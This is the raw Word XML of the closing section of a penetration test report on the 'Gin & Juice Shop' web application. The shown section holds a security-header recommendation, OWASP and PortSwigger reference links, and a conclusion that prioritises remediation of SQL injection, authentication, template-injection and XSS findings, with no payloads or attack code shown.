        <w:t>, and enable Strict-Transport-Security with an appropriate max-age for all HTTPS responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67740685" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B01FE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP Secure Headers Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31F859C5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>MDN — HTTP Security Headers Reference</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F98B502" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP HTTP Security Response Headers Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4064CA6B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B649A7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D348340" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This assessment identified seven findings ranging from Critical to Informational severity. The Critical SQL Injection finding (F-01) should be treated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the highest priority for remediation, as it directly threatens data confidentiality and integrity. The High-severity authentication and template-injection issues (F-02, F-04) should be remediated next, followed by the Medium and Low XSS findings and th</w:t>
      </w:r>
      <w:r>
        <w:t>e header hardening recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C2A8F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>It is recommended that all findings be retested following remediation to confirm the fixes are effective and do not introduce regressions. A broader secure-code review and the introduction of automated security testing (</w:t>
      </w:r>
      <w:r>
        <w:t>SAST/DAST) in the CI/CD pipeline would help prevent recurrence of similar issues in future releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19709E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This report reflects the state of the application at the time of testing. It should not be considered a guarantee that no further vulnerabilities exist.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00514271">
      <w:headerReference w:type="default" r:id="rId34"/>
      <w:footerReference w:type="default" r:id="rId3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9B1DA" w14:textId="77777777" w:rsidR="00877F8D" w:rsidRDefault="00877F8D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="29F21DCF" w14:textId="77777777" w:rsidR="00877F8D" w:rsidRDefault="00877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3E830" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">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A569E6">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A569E6">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9F831" w14:textId="77777777" w:rsidR="00877F8D" w:rsidRDefault="00877F8D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4EDCFACE" w14:textId="77777777" w:rsidR="00877F8D" w:rsidRDefault="00877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71FE7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="CBD5E1"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Gin &amp; Juice Shop — Penetration Test </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Report  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>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F168FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59185214"/>
    <w:lvl w:ilvl="0" w:tplc="498A8BD4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EC0ACF28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B7FE0C74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3462EE84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EFCC2664">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="225EDF40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4BA09D7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C80E6B88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AD1450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71"/>
    <w:rsid w:val="00514271"/>
    <w:rsid w:val="00877F8D"/>
    <w:rsid w:val="00A569E6"/>
    <w:rsid w:val="00F504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3276"/>
  <w15:docId w15:val="{97DF4997-3ED5-440F-A83D-13A75F68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cheatsheetseries.owasp.org/cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/reflected" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/client-side-template-injection"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portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html" TargetMode="Externa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4.jpg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scrip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Top10/A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"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ortswigger.net/web-security/authentication/other-mechanisms" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.angular.dev/discontinued-long-term-support-for-angularjs-cc066b82e65a" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-secure-header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cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jp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A34E5-3A98-44E7-B22B-40F824433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3201</Words>
  <Characters>18250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 Khalid</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-03T10:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T11:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>